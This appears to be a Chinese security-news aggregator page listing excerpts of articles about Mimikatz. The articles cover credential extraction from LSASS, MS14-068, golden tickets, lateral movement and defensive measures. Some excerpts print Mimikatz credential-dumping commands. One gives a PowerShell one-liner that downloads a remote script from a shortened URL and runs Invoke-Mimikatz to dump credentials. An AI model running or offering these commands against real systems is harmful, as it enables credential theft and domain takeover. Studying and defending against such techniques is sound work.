记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

探索 Mimikatz 神器之 WDigest

自从 Mimikatz 出现以来,我们很多人已经对这个工具进行过封装,也尝试过注入,或者是使用 powershell 实现类似的功能。现在我们决定给这个工具添加一个内存 dump 的功能,无论我们如何封装使用 Mimikatz,它仍然是 Windows 系统中从 lsass 进程中提取凭证的首选工具。 当然,这是因为微软引入的每一个新的安全措施,GentilKiwi 总会有对应的“诡计”。 如果你曾经看过 Mimikatz 所付出的努力,你会觉得那绝非易事,因为它支持所有的 Windows x86和 x64版本(最近还增加了支持 ARM 上 Windows 的功能)。 当然,随着 Mimikatz 多年来的成功,Blu
发布时间:2019-07-04 12:25 | 阅读:78639 | 评论:0 | 标签:内网渗透 安全工具 系统安全 Mimikatz 域渗透技术

Mimikatz中SSP的使用

Mimikatz中SSP的使用Mimikatz中的mimilib(ssp)和misc::memssp同sekurlsa::wdigest的功能相同,都能够从lsass进程中提取凭据,通常可获得已登录用户的明文口令(Windows Server 2008 R2及更高版本的系统默认无法获得),但实现原理不同,所以绕过高版本限制的方法也不同。我对XPN的第二篇文章进行了学习,对这个技术有了新的认识,于是尝试对这个技术进行总结,添加一些个人的理解。XPN的博客:https://blog.xpnsec.com/exploring-mimikatz-part-2/0x01 简介本文将要介绍以下内容:· SSP简介·&nb
发布时间:2019-06-28 12:25 | 阅读:63303 | 评论:0 | 标签:技术 Mimikatz

Mimikatz中sekurlsa::wdigest的实现

0x00 前言Mimikatz中sekurlsa::wdigest是渗透测试中经常会用到的功能,它能够从lsass进程中提取凭据,通常可获得已登录用户的明文口令(Windows Server 2008 R2及更高版本的系统默认无法获得,需要修改注册表等待用户再次登录才能获得)。XPN在他的博客中记录了对WDigest的研究心得,开源了一个POC,通过C++实现了在Win10_1809 x64下从lsass进程中提取凭据。本文将会对XPN的POC进行扩展,使其支持Win7/Win8/Windows Server2008/Windows Server2008 R2/Windows Server2012/Windows Se
发布时间:2019-06-26 12:25 | 阅读:62347 | 评论:0 | 标签:技术 Mimikatz

防御Mimikatz攻击的方法介绍

简单介绍Mimikatz攻击Mimikatz在内网渗透测试中发挥着至关重要的作用,主要是因为它能够以明文形式从内存中提取明文密码。 众所周知,攻击者在他们的渗透中大量使用Mimikatz, 尽管微软推出了安全补丁,但是在较旧的操作系统(如Windows 2008 Server)中Mimikatz还是仍然有效,所以在很多情况下它可能导致横向移动和域权限提升。 值得注意的是,如果Mimikatz是从本地管理员等权限执行的,则它只能导出用户凭据和密码哈希值。下面通过几种方法来防御Mimikatz攻击:Debug权限设置根据Microsoft的调试权限确定哪些用户可以将调试器附加到任何进程或内核。默认情况下,此权限授予本地管理
发布时间:2018-08-20 17:20 | 阅读:92227 | 评论:0 | 标签:技术 Mimikatz

MS14-068域权限提升漏洞总结

0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票。银票是一张tgs,也就是一张服务票据。服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器。所以ms14-068的来源和银票是息息相关的。 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是kb3011780。在server 2000以上的域控中,只要没有打这个补丁,那么情况将是非常糟糕的。 https://technet.microsoft.com/library/security/ms14-068.aspx 0x02 漏洞利用 2.1 windows
发布时间:2017-02-10 04:25 | 阅读:178738 | 评论:0 | 标签:内网渗透 Kali mimikatz MS14-068 ms14-068.py psexec pykek windows

mimikatz 2.1 20161126 发布

简介 mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,非常强大。 mimikatz 最近发布了它的新版本,sekurlsa模块现在使用最小的权限来读取LSASS进程内存,并在需要(切换)传递哈希值时切换更多权限。 使用 只需要两条命令: 第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords //抓取密码 测试截图 环境:Windows10 企业版 X64 项目地址 mimikatz博客:http://blog.gentilkiwi.com 下载地址:https://github.com/gentilkiwi/mimikatz/release
发布时间:2016-11-28 00:05 | 阅读:146810 | 评论:0 | 标签:工具 mimikatz mimikatz2.1

SQLi、权限提升和PowerShell Empire

介绍 为演示一些非常基本的SQL注入(SQLi)以及如何利用PowerShell Empire进行权限提升,我建立了一个小实验室。 演示将以网络上的未经身份验证的用户启动,并以目标Active Directory域的完全管理权限结束。 演示视频: 工具 演示中使用到的工具: Kali PowerShell Empire nmap sqlmap john 实验室设置 实验室包括以下服务器: 域控制器 – Windows Server 2012 R2 Web服务器 – Windows Server 2008 R2 SQL Server (SQL Express 2014) – Windows Server 2012 R2 Kali – Rolling Rele
发布时间:2016-11-14 20:30 | 阅读:313792 | 评论:0 | 标签:Web安全 Empire Kali mimikatz nmap powershell PowerUp sql injec

mimikatz新版发布:支持Windows 10 AU & Server 2016

简介 只要借用一下电脑,便可轻松拿到密码……“女神,借用电脑一看可否?” mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,非常强大 mimikatz 最近发布了它的新版本,新版支持Windows 10 AU & Server 2016 (1607 – build 14393),更多功能等着大家来发现 使用 只需要两条命令 第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords //抓取密码 测试截图 环境:Windows2008 R2 X64 项目地址 mimikatz博客:http://blog.gentilkiwi.c
发布时间:2016-10-26 15:45 | 阅读:139472 | 评论:0 | 标签:工具 mimikatz Server 2016 windows 10 密码抓取 明文抓取

解析Mimikatz日志文件

概述 在内网渗透和模拟攻击中,Mimikatz(或其衍生物)通常是标准工具包的一部分。它具有很强大的功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。它通常以以下形式显示输出: Username : Domain : Password : 虽然一些工具将解析这个输出,但在有些情况下,能够解析多个文件很有用,也可能包括mimikatz的输出,也许与其他输出交错。示例包括当使用一个LSASS内存dump取文件或者分析来自一系列RAT以及shells原始输出时Mimikatz的输出,这可能不包括内置Mimikatz解析功能。我对这个问题的解决方案是编写一个相对快速的工具,它使用正则表达式从流输入定位有趣的mimikatz输出,并将其插入SQLite数
发布时间:2016-10-16 22:50 | 阅读:123485 | 评论:0 | 标签:内网渗透 LSASS内存 mimikatz SQLite 日志文件

Use MSBuild To Do More

0x00 前言 最近Casey Smith@subTee更新了一系列关于”MSBuild”的研究进展,对我有很大启发。 本文将基于他公开的POC,并结合我的研究心得,介绍以下MSBuild的应用技巧: Execute PowerShell Commands Execute PE file Execute Shellcode VisualStudio Persistence 0x01 简介 MSBuild是Microsoft Build Engine的缩写,代表Microsoft和Visual Studio的新的生成平台 MSBuild可在未安装Visual Studio的环境中编译.net的工程文件 MSBuild可编译特定格式的xml文件 更多基本知识可参照以下链接: https://msdn.micro
发布时间:2016-10-12 06:05 | 阅读:116890 | 评论:0 | 标签:系统安全 mimikatz MSBuild poc powershell shellcode

Windows域横向渗透

环境拓扑 我们的目的是获取redhook.DA域的一个可用的账户,当前攻击者已在公司网络内,但并未在同一个子网。 Compromising Client 1 假设我们已经获取到了Client1的登陆凭据,如果网络足够大,你可以发现存储在某处网络共享上面的其他凭据(通过批量的脚本:vbs,ps1,.net等等)。关于怎么访问网络,你可以使用Cobalt Strike框架。 我们可以这样做: 我们可以通过批量的脚本快速的获得NETBIOS的信息。 在win上,可以用命令nbtstat -A IP获得相同的信息,可以看到机器名是WIN7-ENT-CLI1,属于REDHOOK域。 PsExec: 使用msf的psexec可以很容易的获取到一个shell。BOB是一个本地用户,不用指定SMBDomain参数。 我
发布时间:2016-09-20 21:35 | 阅读:192336 | 评论:0 | 标签:内网渗透 文章 exploit Incognito metasploit mimikatz PowerSploit 信息

Mimikatz小实验:黄金票据+dcsync

这篇博文是为了解释下Benjamin Delpy(@gentilkiwi)在这条推特上写的东西,看官们且耐住性子。FreeBuf科普时间krbtgt账户:每个域控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。黄金票据(Golden Ticket):简单来说,它能让黑客在拥有普通域用户权限和krbtgt hash的情况下,获取域管理员权限。dcsync:mimikatz中的功能,可以有效地“假冒”一个域控制器,并可以向目标域控制器请求帐户密码数据。下面根据@gentilkiwi的描述,我会做一个实验。获取域管理权限首先,我以较低的权限运行了mimikatz,这个权限为Windows工作站的本地用户,也就是我demo域成员。在这里,我们需
发布时间:2016-08-26 21:45 | 阅读:157002 | 评论:0 | 标签:工具 系统安全 dcsync Golden Ticket krbtgt Mimikatz

后渗透攻防的信息收集

1.0前言 后渗透常见的信息收集思路 延伸: 渗透测试中的技巧 后渗透阶段的攻防对抗 linux入侵后续指南 mimikittenz:又一款Windows密码获取工具 1.1系统管理员密码 A.常用来获取windows密码的工具 1.mimikatz 2.wce 3.getpass 4.QuarksPwDump 5.reg-sam 6.pwdump7 7.procdump.exe +mimikatz ……. B.免杀抓取密码的两种方式 1.powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"tips:
发布时间:2016-08-25 15:15 | 阅读:108882 | 评论:0 | 标签:内网渗透 cookies mimikatz mimikittenz passrec powershell 信息收集 后渗

一次完整的从webshell到域控的探索之路

前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里。 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。 今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来。 相关知识点总结如下: 免杀 payload 的生成,请使用 Veil msf 在 meterpreter 下的提权尝试 msf 在 meterpreter 下的 bypassuac 尝试 内网渗透测试过程中的信息关联 meterpreter 的路由添加以及相关扫描 Powershell 在 meterpreter 下面的使用 Meterpreter 的 post 模块使用 Msf 的 custom 自己生成的 payload 的使用 进
发布时间:2016-08-21 00:35 | 阅读:199239 | 评论:0 | 标签:内网渗透 bypassuac cimoom dumphash Empire hashdump Impersonate_t

如何防止Mimikatz「获取」Windows密码

黑客总是在用最简单的攻击方式来实现他们的目的,比如用已经存在了好多年的工具——Mimikatz(猕猴桃),它可以从系统内存中轻松获取到明文密码。受影响的系统Windows 7和Windows Server 2008(老系统也受影响)。最新的Windows 8 / 10 、Windows Server 2012 / 2016原本是不受影响的,但是高权限的黑客可以通过修改注册表来实现这样的攻击。风险黑客拥有系统管理员权限,就能从内存中获取登录认证信息(明文/各种哈希格式)。描述在Windows XP中,Microsoft增加了对“WDigest”协议的支持。该协议基于RFC 2617和2831。客户端用该协议向HTTP和SASL应用发送明文凭证,Windows会将密码缓存在内存中,便于用户登录
发布时间:2016-06-27 19:20 | 阅读:112253 | 评论:0 | 标签:漏洞 系统安全 Mimikatz WDigest windows 内存 服务器

如何防御“神器”Mimikatz窃取系统密码?

Mimikatz是一款能够从Windows中获取内存,并且获取明文密码和NTLM哈希值的神器,本文将介绍如何防御这款软件获取密码。 Mimikatz介绍Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的工具,攻击者可以借此漫游内网。他们可以通过明文密码或者传递hash值来提权。可能很多人会问“难道微软就没想过怎么防御吗?”在Google上搜索“mimikatz的防御”,你会发现搜索结果很有限。我找到的最好的一篇文章就是这篇。里面提到了很多好的建议,诸如使用最近版本的活动目录中的“受保护的用户”用户组(SID:S-1-5-21–525),或者是限制使用管理员,或者通过注册表设置不在内存中储存密码。你可以限
发布时间:2016-02-18 13:55 | 阅读:108777 | 评论:0 | 标签:工具 系统安全 Mimikatz

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云